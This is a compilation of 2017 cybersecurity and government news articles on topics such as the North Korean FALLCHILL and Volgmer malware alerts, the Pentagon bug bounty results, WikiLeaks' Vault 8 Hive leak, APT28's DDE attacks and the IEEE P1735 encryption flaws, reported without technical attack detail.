A joint alert issued by the DHS and FBI said a remote administration tool (RAT) known as FALLCHILL was used by the North Korean government to hack into companies in the aerospace, telecommunications, and finance sectors. The alert describes FALLCHILL as a “fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies.”

The U.S. Government has been able identify 83 network nodes in the infrastructure used by the FALLCHILL malware. The alert says that, according to a trusted third party, FALLCHILL uses fake SSL headers for communications. "After collecting basic system information, the backdoor will begin communication with the C&C server using a custom encrypted protocol with the header that resembles TLS/SSL packets," it reads."

In a separate alert issued Tuesday, the DHS and FBI shared a list of Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a variant of the Volgmer Trojan used by the North Korean government. The alert describes Volgmer as a backdoor Trojan “designed to provide covert access to a compromised system.” The DHS says at least 94 static IP addresses were identified to be connected to Volgmer's infrastrucutre, along with dynamic IP addresses registered across various countries.

According to DHS, the North Korea-linked hackers have been using Volgmer malware in attacks against the government, financial, automotive, and media industries since at least 2013.

“DHS and FBI are distributing these IP addresses to enable network defense and reduce exposure to North Korean government malicious cyber activity,” the alert states.

The DHS warned that spear phishing appears to be the primary delivery mechanism for Volgmer infections; but added that the Hidden Cobra threat actors also use a suite of custom tools, some of which could also be used to initially compromise a system.

The alert with technical details and IOCs on FALLCHILL are available here. The alert and technical details for the the Volgmer Trojan are available here.

In June, US-CERT released a technical alert to warn organizations of distributed denial-of-service (DDoS) attacks conducted by Hidden Cobra.


US DHS and FBI share reports on FALLCHILL and Volgmer malware used by North Korean Hidden Cobra APT
15.11.2017 securityaffairs BigBrothers

US DHS published the details of the malware FALLCHILL and Volgmer used by the APT group Hidden Cobra that is linked to the North Korean government.
The US Department of Homeland Security (DHS) published the details of the hacking tool FALLCHILL used one of the APT group linked to the North Korean government tracked as Hidden Cobra (aka Lazarus Group).

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems. Security researchers discovered that North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was behind, other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Picture hack.

In June, the United States Computer Emergency Readiness Team (US-CERT) issued a technical alert about the activity of the North Korea’s ‘Hidden Cobra’ APT group.

Many experts believe the WannaCry ransomware was developed by the Lazarus Group due to similarities in the attack codes. UK Government also linked the WannaCry attack that crippled NHS to North Korea.

The DHS and FBI issued a joint alert that reveals a remote administration tool (RAT) known as FALLCHILL was used by the North Korean hackers to target companies in the aerospace, finance, and telecommunications sectors.

“Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a remote administration tool (RAT) used by the North Korean government—commonly known as FALLCHILL.” states the report.

“According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies. “

The US experts identified 83 network nodes in the FALLCHILL infrastructure, including countries in which the infected IP addresses are registered.

The report includes a list of indicators of compromise (IOCs), Network Signatures associated with the threat and Yara rules for its detection.

north korea

The US DHS also published a separate report on another threat, the Volgmer Trojan used by the North Korean government. The Volgmer is a backdoor Trojan “designed to provide covert access to a compromised system,” it has been used since 2013.

“Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. Since at least 2013, HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government, financial, automotive, and media industries.” states the report.

“It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections; however, HIDDEN COBRA actors use a suite of custom tools, some of which could also be used to initially compromise a system. Therefore, it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer”

This second report also includes details of the infrastructure associated with the malware and IoCs.

The DHS tracked at least 94 static IP addresses along with dynamic IP addresses registered across various countries, most of them in India (772 IPs – 25.4 percent), Iran (373 IPs – 12.3 percent), and Pakistan (343 IPs – 11.3 percent).

The Volgmer malware was used by Pyongyang in attacks against the government, financial, automotive, and media industries since at least 2013, The threat was delivered via spear-phishing emails.

The DHS warned of the Hidden Cobra availability of a suite of custom tools that the North Korean hackers used to hack into the companies.


Freedom of the Net report – Manipulating Social Media, hacking election and much more
14.11.2017 securityweek BigBrothers

Freedom of the Net report – Online manipulation played a crucial role in elections in at least 18 countries over the past year, including the United States.
While cyber security experts still debate cyber attacks against 2016 Presidential Election, according to the independent watchdog Freedom House at least 18 countries had their elections hacked last year.

The group surveyed 65 nation states comprising 87 percent of internet users and observed that in at least 18 cases, foreign governments or outside bodies had tried to influence an election by restricting or interfering with internet use.

According to the organization, Governments around the world are dramatically increasing their efforts to manipulate information on social media, threatening the notion of the internet as a liberating technology, this is the message emerged from annual Freedom of the Net report.

“The use of paid commentators and political bots to spread government propaganda was pioneered by China and Russia but has now gone global,” said Michael Abramowitz, president of Freedom House. “The effects of these rapidly spreading techniques on democracy and civic activism are potentially devastating.”

While in some cases the interference attempts were performed by foreign actors, in the majority of the cases they were carried out either by the local government or opposition. The watchdog reported that 30 countries have now been found to be running armies of trolls to try and influence public sentiments on specific topics.

“Venezuela, the Philippines, and Turkey were among 30 countries where governments were found to employ armies of “opinion shapers” to spread government views, drive particular agendas, and counter government critics on social media.” states the report. “The number of governments attempting to control online discussions in this manner has risen each year since Freedom House began systematically tracking the phenomenon in 2009.”

Chined Government is the most active in this sense, it used a cyber army composed of bloggers and social media users who support its politics and discredit political opponents. Unfortunately, China isn’t the only one, in Russia, the Internet Research Agency is the “troll farm” reportedly financed by a businessman with close ties to President Vladimir Putin.

Unlike other methods of censorship, the online content manipulation is very difficult to detect and combat, the countering content manipulation takes time and resources.

“Not only is this manipulation difficult to detect, it is more difficult to combat than other types of censorship, such as website blocking, because it’s dispersed and because of the sheer number of people and bots deployed to do it,” said Sanja Kelly, director of the Freedom on the Net project. “The fabrication of grassroots support for government policies on social media creates a closed loop in which the regime essentially endorses itself, leaving independent groups and ordinary citizens on the outside.”

Freedom of the Net report

Giving a look at other data in the report, Freedom House classified only 23 percent of the internet as “free.”

Freedom of the Net Freedom House image

14 countries this year passed laws to restrict the internet use, in some cases, Governments banned the use of VPNs, 19 countries have used some kind of internet shutdown during political events.

The report also warns of physical attacks on netizens and online journalists spread globally, in 8 countries (including Brazil, Mexico, Pakistan, and Syria) journalists or online commentators have been killed for their online activities.

According to the Freedom of the Net report the things will get worse in the future.


Bug bounty programs and a vulnerability disclosure policy allowed Pentagon fix thousands of flaws
13.11.2017 securityaffairs BigBrothers

Bug bounty programs allowed the US agency to receive 2,837 valid bug reports from 650 white hat hackers located in 50 countries around the world.
Bug bounty program ‘Hack the Pentagon’ launched by the Pentagon in 2016 along with the vulnerability disclosure policy announced nearly one year ago allowed the US agency to receive 2,837 valid bug reports from 650 white hat hackers located in 50 countries around the world.

“Great news for U.S. citizens! Over 3,000 valid security vulnerabilities have been resolved with the U.S. Department of Defense’s “Hack the Pentagon” hacker-powered security program.” reported the platform used by the US Government to manage the initiatives.

“Just over a year ago, following the success of the pilot, we announced the U.S. Department of Defense was expanding its “Hack the Pentagon,” initiatives. To date, HackerOne and DoD have run bug bounty challenges for Hack the Pentagon, Hack the Army and Hack the Air Force.

The success of the bug bounty programs launched by the UG Government has been undeniable.

The hackers have earned over $300,000 in bounties for their contributions, they reported nearly 500 vulnerabilities in nearly 40 DoD components, more than 100 of the flaws have been rated critical or high severity.

Let me also remind you that the DoD vulnerability disclosure program does not offer any monetary rewards, instead it allows hackers to report security holes without the fear of potential legal consequences.

The list of vulnerabilities includes remote code execution, SQL injection, and authentication bypass issues.

Bug bounty Hack the Pentagon

The majority of the reports were submitted by US researchers, followed by white hat hackers in India, the U.K., Pakistan, Philippines, Egypt, Russia, France, Australia and Canada.

Going through the various bug bounty initiatives launched by the US Government, we can notice that the Hack the Pentagon received 138 valid submissions and paid out roughly $75,000, the Hack the Army paid out approximately $100,000 for 118 valid reports, and Hack the Air Force, which paid out $130,000 for 207 valid reports.

Following the success of “Hack the Pentagon,” several bug bounty programs were announced by U.S. authorities.


Hackers Helped Pentagon Patch Thousands of Flaws
13.11.2017 securityweek BigBrothers
Bug bounty programs and a vulnerability disclosure policy have helped the U.S. Department of Defense patch thousands of security holes in its systems.

Nearly one year after it announced its vulnerability disclosure policy, the Pentagon received 2,837 valid bug reports from roughly 650 white hat hackers located in 50 countries around the world, according to HackerOne, the platform used by the organization to host its projects.

More than 100 of the flaws reported to the Pentagon through its vulnerability disclosure program have been rated critical or high severity. Weaknesses, found in nearly 40 DoD components, include remote code execution, SQL injection, and authentication bypass issues.

A majority of the reports were submitted by researchers from the United States, followed by India, the U.K., Pakistan, Philippines, Egypt, Russia, France, Australia and Canada.

The DoD vulnerability disclosure program does not offer any monetary rewards - it only provides a channel for reporting security holes without the fear of potential legal consequences.

However, the Pentagon’s cybersecurity initiatives also include several bug bounty programs that offered monetary rewards. Researchers who took part in these challenges earned more than $300,000 for almost 500 flaws discovered in the organization’s public-facing systems. On the other hand, the government estimated that it saved millions of dollars by running these bug bounty programs.

The first initiative was Hack the Pentagon, which received 138 valid submissions and paid out roughly $75,000. Next were Hack the Army which paid out approximately $100,000 for 118 valid reports, and Hack the Air Force, which earned participants $130,000 for 207 valid reports.

Following the success of “Hack the Pentagon,” several bug bounty programs and related initiatives were announced by U.S. government organizations and lawmakers.

The General Services Administration (GSA) has launched a bug bounty program that offers rewards ranging between $300 and $5,000, and the Internal Revenue Service (IRS) announced a $2 million contract with security testing firm Synack for help in securing its online presence.

The Department of Justice (DoJ) has created a framework designed to help organizations develop formal vulnerability disclosure programs.

As for legislation, the Internet of Things (IoT) Cybersecurity Improvement Act of 2017 will require companies that provide Internet-connected devices to the government to have a vulnerability disclosure policy. Senators also announced the Hack Department of Homeland Security (DHS) Act, which aims to establish a bug bounty pilot program within the DHS.


DHS – Tests demonstrate Boeing 757 airplanes vulnerable to hacking
13.11.2017 securityaffairs BigBrothers

Researchers and private industry experts, along with DHS officials, remotely hacked a Boeing 757 airplane that was parked at the airport in Atlantic City.
A group of researchers and private industry experts, along with DHS officials, remotely hacked a Boeing 757 airplane owned by the DHS that was parked at the airport in Atlantic City, New Jersey.

The team didn’t have physical access to the plan, the experts interacted with systems on the aircraft remotely via “radio frequency communications.”

The successful experiment took place in September 2016, pilots were not informed of the ongoing cyber attacks. In just two days, the reached their goal, but the details of the hack were not disclosed and will remain classified.

The experiment and its results were disclosed last week during the 2017 CyberSat Summit in Virginia. The test was revealed by Robert Hickey, aviation program manager with the Cyber Security Division of the DHS Science and Technology (S&T) Directorate.

Many aviation experts declared to be aware of the flaw exploited by Hickey and his team, but seven experienced pilots at American Airlines and Delta Air Lines airline companies had no knowledge of the issue when they were briefed in a March 2017 issue.

“All seven of them broke their jaw hitting the table when they said, ‘You guys have known about this for years and haven’t bothered to let us know because we depend on this stuff to be absolutely the bible,'” explained Hickey.

boeing 757

Even is the Boeing 757 in no more in production since 2004, but it’s still largely used by many companies, also President Donald Trump’s personal airplane is a Boeing 757.

Legacy aircraft, which make up more than 90% of the commercial planes actually in use, don’t have security protections differently by newer planes that are built with a security by design approach.

Patch management is a big problem in the avionics industry, the cost to change just one line of code on a piece of avionics equipment could reach $1 million, and it takes a year to implement.

For this reason, security updates are not so frequent.

Hacking airplane is not a novelty, in 2015, the FBI arrested the expert Chris Roberts who claimed to have hacked a commercial airplane while in flight accessing the plane’s systems by triggering a WiFi flaw in the in-flight entertainment system.

Modern aircraft are very sophisticated systems, but the massive introduction of technology could have the side effect to unload their surface of attack is the risk of airplane hacking is underestimated.


Vault 8: WikiLeaks Releases Source Code For Hive - CIA's Malware Control System

10.11.2017 thehackernews BigBrothers

Almost two months after releasing details of 23 different secret CIA hacking tool projects under Vault 7 series, Wikileaks today announced a new Vault 8 series that will reveal source codes and information about the backend infrastructure developed by the CIA hackers.
Not just announcement, but the whistleblower organisation has also published its first batch of Vault 8 leak, releasing source code and development logs of Project Hive—a significant backend component the agency used to remotely control its malware covertly.
In April this year, WikiLeaks disclosed a brief information about Project Hive, revealing that the project is an advanced command-and-control server (malware control system) that communicates with malware to send commands to execute specific tasks on the targets and receive exfiltrated information from the target machines.
Hive is a multi-user all-in-one system that can be used by multiple CIA operators to remotely control multiple malware implants used in different operations.
Hive’s infrastructure has been specially designed to prevent attribution, which includes a public facing fake website following multi-stage communication over a Virtual Private Network (VPN).
"Using Hive even if an implant is discovered on a target computer, attributing it to the CIA is difficult by just looking at the communication of the malware with other servers on the internet," WikiLeaks says.
As shown in the diagram, the malware implants directly communicate with a fake website, running over commercial VPS (Virtual Private Server), which looks innocent when opened directly into the web browser.

However, in the background, after authentication, the malware implant can communicate with the web server (hosting fake website), which then forwards malware-related traffic to a "hidden" CIA server called 'Blot' over a secure VPN connection.
The Blot server then forwards the traffic to an implant operator management gateway called 'Honeycomb.'
In order to evade detection by the network administrators, the malware implants use fake digital certificates for Kaspersky Lab.
"Digital certificates for the authentication of implants are generated by the CIA impersonating existing entities," WikiLeaks says.
"The three examples included in the source code build a fake certificate for the anti-virus company Kaspersky Laboratory, Moscow pretending to be signed by Thawte Premium Server CA, Cape Town."
The whistleblowing organisation has released the source code for Project Hive which is now available for anyone, including investigative journalists and forensic experts, to download and dig into its functionalities.
The source code published in the Vault 8 series only contains software designed to run on servers controlled by the CIA, while WikiLeaks assures that the organisation will not release any zero-day or similar security vulnerabilities which could be abused by others.


NATO to Increase Cyber Weaponry to Combat Russia
10.11.2017 securityweek BigBrothers
NATO members agreed Wednesday to increase the use of cyber weaponry and tactics during military operations, with the alliance also upgrading other capabilities to combat a resurgent Russia.

The changes are part of the alliance's biggest shakeup since the Cold War, with defence ministers backing the creation of two new command centres to help protect Europe.

The revamp reflects the "changed security environment" of recent years, NATO chief Jens Stoltenberg said at a meeting of defence ministers in Brussels.

The threat to the alliance's eastern flank has grown as a concern after Russia's annexation of Crimea in 2014.

"We are now integrating cyber effects into NATO missions and operations to respond to a changed and new security environment where cyber is part of the threat picture we have to respond to," Stoltenberg said.

"In any military conflict cyber will be an integral part and therefore we need to strengthen our cyber defences and our cyber capabilities," he added, noting that such tactics have been effective in the fight against IS in Iraq and Syria.

After years of stripping back its command structure since the end of the Cold War, NATO wants to add the new command centres -- one to protect lines of communication across the Atlantic and one to coordinate the movement of troops and equipment around Europe.

- NATO hit by cyber attacks -

The creation of a new NATO cyber operations hub comes as the alliance faces hundreds of attacks on its networks every month and fears grow over the Kremlin's electronic tactics.

NATO declared cyber -- where attackers disrupt websites, intercept communications and sabotage technologies used in combat -- as a conflict domain last year, putting it on a par with land, sea and air.

"We have seen a more assertive Russia, we have seen a Russia which has over many years invested heavily in their military capabilities," Stoltenberg said.

"NATO has to be able to respond to that. We are constantly adapting and what we are doing in Europe now is part of that adaptation."

Cyber capabilities will now be included in NATO missions in the same way as planes, tanks and ships -- fully integrated but still under the control of the contributing country.

The two-day meet at NATO headquarters will also cover the North Korean nuclear crisis, which will be the focus of a working dinner on Wednesday, where defence ministers will be joined by the EU's diplomatic chief Federica Mogherini.

US President Donald Trump arrived in on Beijing Wednesday to press China to do more to get Pyongyang to curb its nuclear and ballistic weapons programmes.

- US role in Syria? -

Tensions have soared since Pyongyang carried out its sixth nuclear test -- its most powerful to date.

"All NATO allies agree that we have to put strong pressure on North Korea because North Korea is responsible for reckless behaviour, irresponsible behaviour developing nuclear weapons and by developing missiles," Stoltenberg said.

On Thursday talks will turn to Afghanistan, where NATO plans to boost its training and support mission for local forces by some 3,000 troops.

Later in the day US Defense Secretary Jim Mattis will hold a separate meeting with partners from the coalition fighting IS in the Middle East, where the jihadists continue to lose territory.

As he flew to Europe, Mattis told reporters that coalition partners are looking to the United States for a clear plan about what follows the physical defeat of IS.

"Maybe three-quarters of the questions I am getting asked now is (about) going forward. They are now saying: 'What's next? How is it looking?'" Mattis said.

Following back-to-back losses, including of their Syrian and Iraqi strongholds of Raqa and Mosul, IS fighters are down to defending their last holdouts along the Euphrates River valley.

America's military involvement in Syria has until now been focused solely on fighting IS.

A French source also said allies were keen to hear what Mattis had to say about the role of Iran -- a key supporter of Syrian President Bashar al-Assad -- following Trump's tough rhetoric against Tehran.


WikiLeaks Says CIA Impersonated Kaspersky Lab
10.11.2017 securityweek BigBrothers
WikiLeaks has resumed its CIA leaks and it has now started publishing source code and other files associated with tools allegedly developed by the intelligence agency.

In March, WikiLeaks began publishing documentation files describing what appeared to be CIA hacking tools as part of a leak dubbed Vault 7. Roughly two dozen tools and projects were disclosed over the course of several months.

Now, after a two-month break, WikiLeaks announced a new round of leaks dubbed Vault 8, which provides source code and analysis for CIA tools. The organization pointed out that, similar to Vault 7, Vault 8 will not expose any zero-day or other vulnerabilities that could be used for malicious purposes.

“This publication will enable investigative journalists, forensic experts and the general public to better identify and understand covert CIA infrastructure components,” WikiLeaks said. “Source code published in this series contains software designed to run on servers controlled by the CIA.”WikiLeaks announces Vault 8 leaks

The first Vault 8 leak covers Hive, a project whose documentation was published by WikiLeaks in mid-April. The organization has now released source code and development logs for Hive.

Hive has been described as a tool designed to help malware communicate with a remote server without raising suspicion.

“Using Hive even if an implant is discovered on a target computer, attributing it to the CIA is difficult by just looking at the communication of the malware with other servers on the internet,” WikiLeaks said. “Hive provides a covert communications platform for a whole range of CIA malware to send exfiltrated information to CIA servers and to receive new instructions from operators at the CIA.”

Hive provides a communication channel between a piece of malware and what WikiLeaks describes as “cover domains.” These domains are boring-looking and they deliver harmless content when accessed.

However, malware implants communicating with these domains authenticate themselves and the traffic they generate is directed to a gateway called Honeycomb, which sends the data to its final destination.

Implants authenticate themselves using digital certificates that impersonate existing entities. One fake certificate is for Russia-based security firm Kaspersky Lab and it pretends to have been issued by South African certificate authority Thawte.

According to WikiLeaks, its analysis revealed that by using these fake certificates, the CIA made it look like data was being exfiltrated by one of the impersonated entities – in this case Kaspersky Lab.

“We have investigated the claims made in the Vault 8 report published on November 9 and can confirm the certificates in our name are fake,” Kaspersky Lab told SecurityWeek. “Our private keys, services and customers are all safe and unaffected.”

The news that the CIA may have impersonated Kaspersky Lab in its operations has led some to believe that the U.S. may have actually used such tools to falsely pin cyberattacks on Russia.

The U.S. government has banned the use of Kaspersky products due to the company’s alleged ties to Russian intelligence. A recent report also claimed that Kaspersky products had been used on the computer of an NSA contractor from which Russian hackers stole sensitive files. Kaspersky has denied the allegations and announced a new transparency initiative in an effort to clear its name.


Russia-Linked Spies Deliver Malware via DDE Attack
8.11.2017 securityweek BigBrothers
The Russia-linked cyber espionage group tracked as APT28 and Fancy Bear has started delivering malware to targeted users by leveraging a recently disclosed technique involving Microsoft Office documents and a Windows feature called Dynamic Data Exchange (DDE).

Researchers at McAfee noticed the use of the DDE technique while analyzing a campaign that involved blank documents whose name referenced the recent terrorist attack in New York City.

Researchers warned recently that DDE, a protocol designed for data exchanges between Windows applications, could be used by hackers as a substitute for macros in attacks involving malicious documents. Shortly after, security firms reported seeing attacks leveraging DDE to deliver malware, including Locky ransomware.

Microsoft pointed out that DDE, which has been replaced with Object Linking and Embedding (OLE), is a legitimate feature. The company has yet to make any changes that would prevent attacks, but mitigations included in Windows do provide protection, and users are shown two warnings before the malicious content is executed.

In the APT28 attacks spotted by McAfee, cyberspies used the document referencing the New York City attack to deliver a first-stage malware tracked as Seduploader. The malware, typically used by the threat actor as a reconnaissance tool, is downloaded from a remote server using PowerShell commands.

Based on the analysis of the malware and command and control (C&C) domains used in the attack, researchers determined that the campaign involving DDE started on October 25.

The attack using the New York City incident as lure appears to be part of a campaign that also involved documents referencing Saber Guardian, a multinational military exercise conducted by the U.S. Army in Eastern Europe in an effort to deter an invasion (by Russia) into NATO territory.

Another recent APT28 attack leveraged a document describing CyCon U.S., a conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) in collaboration with the Army Cyber Institute at West Point. However, the CyCon attack relied on a malicious VBA script and it did not involve DDE.

“Given the publicity the Cy Con U.S campaign received in the press, it is possible APT28 actors moved away from using the VBA script employed in past actions and chose to incorporate the DDE technique to bypass network defenses,” McAfee researchers said in a blog post.

“[The] use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlight APT28’s ability and interest in exploiting geopolitical events for their operations,” they added.


U.S. Government Warns of Weakness in IEEE Encryption Standard
8.11.2017 securityweek
The United States Department of Homeland Security’s US-CERT has issued an alert to warn on cryptographic weaknesses impacting the IEEE P1735 standard, which describes methods for encrypting electronic-design intellectual property and the management of access rights for such IP.

The P1735 IEEE standard is used to ensure confidentiality and access control for the design of complex electronics design intellectual property (IP), where multiple IP owners are usually involved. Newly discovered weaknesses, however, reveal that the standard recommends poor cryptographic choices and is vague or silent on security critical decisions.

The methods described in said Institute of Electrical and Electronics Engineers (IEEE) standard are flawed and enable an attacker to recover the entire underlying plaintext IP, United States Computer Emergency Readiness Team (US-CERT) warns.

Because of these flaws, “implementations of IEEE P1735 may be weak to cryptographic attacks that allow an attacker to obtain plaintext intellectual property without the key, among other impacts,” an alert issued on Friday reads.

Some of the attack vectors that said flaws enable are well-known, such as padding-oracle attacks, but others are new, created by the need to support the typical uses of the underlying IP, “in particular, the need for commercial electronic design automation (EDA) tools to synthesize multiple pieces of IP into a fully specified chip design and to provide HDL syntax errors,” the alert reads.

According to US-CERT, an attacker leveraging the commercial EDA tool as a black-box oracle can exploit these vulnerabilities. The attacker would not only be able to recover entire plaintext IP, but also to “produce standard-compliant ciphertexts of IP that have been modified to include targeted hardware Trojans.”

The weaknesses in the P1735 standard are tracked as CVE-2017-13091 (improperly specified padding in CBC mode allows use of an EDA tool as a decryption oracle), CVE-2017-13092 (improperly specified HDL syntax allows use of an EDA tool as a decryption oracle), CVE-2017-13093 (modification of encrypted IP cyphertext to insert hardware Trojans), CVE-2017-13094 (modification of the encryption key and insertion of hardware Trojans in any IP), CVE-2017-13095 (modification of a license-deny response to a license grant), CVE-2017-13096 (modification of Rights Block to get rid of or relax access control), and CVE-2017-13097 (modification of Rights Block to get rid of or relax license requirement).

The issues are detailed in a research paper titled “Standardizing Bad Cryptographic Practice” (PDF), which was published at the end of September 2017. The paper also provides details on the impact of these security issues.

“An adversary can recover electronic design IPs encrypted using the P1735 workflow, resulting in IP theft and/or analysis of security critical features, as well as the ability to insert hardware Trojans into an encrypted IP without the knowledge of the IP owner. Impacts may include loss of profit and reputation of the IP owners as well as integrated circuits (ICs) with Trojans that contain backdoors, perform poorly, or even fail completely,” US-CERT notes.

To resolve the issue, DHS suggests that developers of EDA software apply the fixes detailed in the researcher's paper. Users are advised to apply any update the vendor releases for their EDA software.

Impacted vendors include AMD, Cadence Design Systems, Cisco, IBM, Intel, Marvell, Mentor Graphics, National Instruments (NI), National Semiconductor Corporation, NXP Semiconductors Inc., Qualcomm, Samsung, Synopsys, Xilinx, and Zuken Inc.


Estonia Arrests Alleged Russian Agent Plotting Cyber-Crime
7.11.2017 securityweek BigBrothers
Estonia said Tuesday it had arrested a suspected Russian spy allegedly plotting a cyber-crime, in the latest incident to strain relations between the small Baltic state and the Kremlin.

The Estonian prosecutor general's office said the unnamed man was suspected of working for Russia's FSB Federal Security Service and of planning a cyber attack targeting state institutions.

"Right now we can say without revealing any details that we've managed to prevent serious damage," Inna Ombler, the state prosecutor in charge of the investigation said in a statement.

Ombler added that the suspect's activities were not connected to an unprecedented electronic ID-card security risk that recently hit the cyber-savvy country.

Dubbed "E-stonia", the eurozone state of 1.3 million people is regarded as being one of the world's most wired nations, with its citizens able to use electronic ID cards to access virtually all public services online via its vast "e-government" portal.

But as of Friday midnight, Tallinn suspended security certificates for up to 760,000 state-issued electronic ID-cards with faulty chips to mitigate the risk of identity theft.

Prime Minister Juri Ratas denied knowledge of any incidents of identity theft as he urged ID-card holders to download an update to patch the flaw in the Swiss-made chips that makes them vulnerable to malware.

Estonia and its neighbors Latvia and Lithuania -- all EU and NATO members -- have been spooked by their Soviet-era master Russia's actions since Moscow annexed Crimea from Ukraine in 2014.

The tensions have led to a spike in espionage affairs and Russia expelled two Estonian diplomats in May after Tallinn booted out its representatives over spying allegations.

In July, a Lithuanian court sentenced a Russian security official to 10 years in prison for spying after prosecutors accused him of attempting to bug the home of President Dalia Grybauskaite.

NATO has deployed four multinational battalions to the three Baltic states and Poland in a sign it is ready to defend any members of the military alliance from a potential attack by Russia.

The Kremlin has denied any territorial ambitions and claims that NATO is trying to encircle Russia.


Twitter-Happy Trump to Enter China's Great Firewall
7.11.2017 securityweek  BigBrothers
US President Donald Trump has tweeted energetically throughout his Asian tour so far, but in China he will likely be one of a select few to skirt the country's ban on his cherished website.

The Twitter-happy president has fired off a slew of posts -- on both domestic and international issues -- since he started his trip in Japan and moved on to South Korea on Tuesday.

But when he lands in China on Wednesday, Trump will enter the so-called "Great Firewall" of online censorship that monitors people's internet habits and blocks websites such as Twitter, Facebook and Google.

Chinese can face fines or even jail time for unfavourable social media posts. Authorities have further tightened internet controls in recent months, shutting down celebrity gossip blogs and probing platforms for "obscenity".

Asked whether Trump –- who will get red-carpet treatment during his state visit –- would be able to tweet, Chinese vice foreign minister Zheng Zeguang told reporters: "How President Trump communicates with the outside is not something you need to worry about."

Trump, who has used an iPhone for Twitter posts, could use some options available to people in China to evade the Great Firewall -- though US presidents in any case travel with their own sophisticated communications systems.

- 'Trump can't live without Twitter' -

Web users can circumvent the firewall if they download a virtual private network (VPN) -- software that allows people to surf the internet as if they were using a server in another country.

But Beijing mandated in January that all developers must obtain government licences to offer VPN software, raising concern it might ban them outright.

Foreign visitors can also access banned websites with their phones if they are in roaming mode -- but only because the authorities currently allow it, according to experts.

Trump should be able to use roaming "but it depends on the policy of the (Chinese) government. If they chose not to allow you to (use roaming) then they can do it," James Gong, a Chinese cyber law expert at Herbert Smith Freehills law firm, told AFP.

"But if you're the president you should be able to do it. Donald Trump cannot live without Twitter," Gong said.

Mobile devices on roaming in China still use the local telecom service infrastructure, which raises privacy and security questions.

Charlie Smith, co-founder of the anti-censorship group Greatfire.org, said phones using data or virtual private networks (VPNs) are "generally" safe from hacking but it depends on the phone, user settings and other factors.

"As you know, every day in China, almost all mobile phone use is monitored and tens of thousands of people are under close watch," he told AFP.

"US officials should be well trained and prepared for travelling overseas and for maintaining secure communications, as the Chinese leadership are when they travel overseas."

Trump could also use an alternative temporary phone as another way to avoid the risk of compromising his smartphone in a country which is often accused of hacking.

- Jail time -

While Trump will likely find ways around the firewall, Chinese people face increasingly stringent controls over what they can do, say and see on the internet.

Chinese internet users face three years in prison for writing defamatory messages that are re-posted 500 times under a law passed in 2013. Web users can be jailed if offending posts are viewed more than 5,000 times.

New rules policing content were imposed this year and several of the country's biggest tech firms were fined for failing to remove illegal online content such as pornography and violence.

China has its own version of Twitter, Weibo, which boasts more than 300 million monthly active users.

Weibo users mostly sounded lukewarm about Trump's upcoming visit: One posted a chart showing heavy pollution levels in Beijing and asked if Trump would regret leaving the Paris climate pact.

But people must be wary of what they write.

Last year, a man who wrote a Weibo post critical of China's decades-old land reform policies on a local traffic police account was sentenced to a year in prison, reports said.

Another man, Qiao Mu, a former professor of international political communications in Beijing, recently moved to the United States after being targeted for his social media commentary.

He said authorities closed over 100 of his Weibo accounts and 17 of his accounts on the WeChat messaging service.

"There is no place for me to publish inside China's firewall," Qiao told AFP, explaining that he had tried to start new accounts after each was shut down.


US DoJ Identifies at least 6 Russian Government officials Involved in DNC hack
4.1.2017 securityaffairs BigBrothers

The United States Department of Justice has gathered evidence to charge at least six Russian government officials involved in the 2016 DNC hack.
The United States Department of Justice has gathered evidence to charge at least six Russian government officials involved in the DNC hack during the 2016 Presidential election.

In the past months, US intelligence blamed Russia for cyberattacks aimed at influencing the 2016 Presidential Election in Donald Trump’s favour.

An FBI-DHS JAR report released in December 2016 implicated Russian hacking group APT28 and APT29 in attacks against 2016 Presidential Election.

Security experts from Mandiant who analyzed the cyber attacks also linked the hack to a cyber espionage campaign associated with the APT28 group.

Now, the Wall Street Journal reported that United States federal prosecutors could bring charges against the alleged unnamed Russian officials early next year.

“The Justice Department has identified more than six members of the Russian government involved in hacking the Democratic National Committee’s computers and swiping sensitive information that became public during the 2016 presidential election, according to people familiar with the investigation.” wrote the Wall Street Journal.

The identities of the six suspects are yet to be revealed.

The US federal intelligence investigators believe that Russian Government conducted a larger campaign that involved “dozens” of other Russian officials in the DNC hack and subsequent data leak.

The acted obeying a direct order of the Russian President Vladimir Putin, that always denied allegations.

The hackers who breached the DNC computer system in 2016 leaked thousands of stolen DNC emails, including personal and sensitive emails from Hillary Clinton campaign manager John Podesta.


The sensitive information was published by the WikiLeaks website.

This is the second time in 2017 when the US Government has charged Russian officials with hacking crimes, in March 2017, the US authorities charged two former Russian FSB agents and two hackers for 2014 Yahoo data breach that caused the exposure of 500 Million Yahoo Accounts.


New York State Proposes Stricter Data Protection Laws Post Equifax
3.11.2017 securityweek BigBrothers

New York State Attorney General Eric T. Schneiderman introduced new legislation Thursday, designed to protect New Yorkers from corporate data breaches like the recent Equifax breach that affected more than 145 million Americans, including 8 million New York residents. Its purpose is to increase the security of private information in a business-friendly manner.

Called the Stop Hacks and Improve Electronic Data Security Act (SHIELD Act), it was introduced by Schneiderman as a program bill, and is sponsored by Senator David Carlucci and Assemblymember Brian Kavanagh. "It's clear that New York's data security laws are weak and outdated. The SHIELD Act would help ensure these hacks never happen in the first place. It's time for Albany to act, so that no more New Yorkers are needlessly victimized by weak data security measures and criminal hackers who are constantly on the prowl," said Schneiderman.

